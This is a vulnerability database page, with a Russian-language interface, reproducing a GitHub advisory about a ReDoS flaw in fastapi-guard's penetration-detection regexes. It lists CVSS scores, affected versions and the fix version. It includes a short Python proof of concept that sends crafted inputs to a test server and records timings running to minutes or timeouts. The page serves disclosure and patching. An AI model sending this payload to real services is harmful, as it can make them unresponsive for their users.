Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-j47q-rc62-w448

Опубликовано: 07 июл. 2025
Источник: github
Github: Прошло ревью
CVSS4: 6.9

Описание

fastapi-guard is vulnerable to ReDoS through inefficient regex

Summary

fastapi-guard detects penetration attempts by using regex patterns to scan incoming requests. However, some of the regex patterns used in detection are extremely inefficient and can cause polynomial complexity backtracks when handling specially crafted inputs.

It is not as severe as exponential complexity ReDoS, but still downgrades performance and allows DoS exploits. An attacker can trigger high cpu usage and make a service unresponsive for hours by sending a single request in size of KBs.

PoC

e.g. https://github.com/rennf93/fastapi-guard/blob/1e6c2873bfc7866adcbe5fc4da72f2d79ea552e7/guard/handlers/suspatterns_handler.py#L31C79-L32C7

payload = lambda n: '<'*n+ ' '*n+ 'style=' + '"'*n + ' '*n+ 'url('*n # complexity: O(n^5) print(requests.post("http://172.24.1.3:8000/", data=payload(50)).elapsed) # 0:00:03.771120 print(requests.post("http://172.24.1.3:8000/", data=payload(100)).elapsed) # 0:01:17.952637 print(requests.post("http://172.24.1.3:8000/", data=payload(200)).elapsed) # timeout (>15min)

Single-threaded uvicorn workers can not handle any other concurrent requests during the elapsed time.

Impact

Penetration detection is enabled by default. Services that use fastapi-guard middleware without explicitly setting enable_penetration_detection=False are vulnerable to DoS.

Пакеты

Наименование

fastapi-guard

pip
Затронутые версииВерсия исправления

<= 3.0.0

3.0.1

EPSS

Процентиль: 27%
0.00098
Низкий

6.9 Medium

CVSS4

Дефекты

CWE-1333

Связанные уязвимости

CVSS3: 7.5
nvd
7 месяцев назад

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely inefficient and can cause polynomial complexity backtracks when handling specially crafted inputs. This vulnerability is fixed in 3.0.1.

CVSS3: 5.3
fstec
7 месяцев назад

Уязвимость средства анализа сетевого трафика, сетевого обнаружения и реагирования fastapi-guard, связанная с использованием регулярного выражения с неэффективной вычислительной сложностью, позволяющая нарушителю вызвать отказ в обслуживании

EPSS

Процентиль: 27%
0.00098
Низкий

6.9 Medium

CVSS4

Дефекты

CWE-1333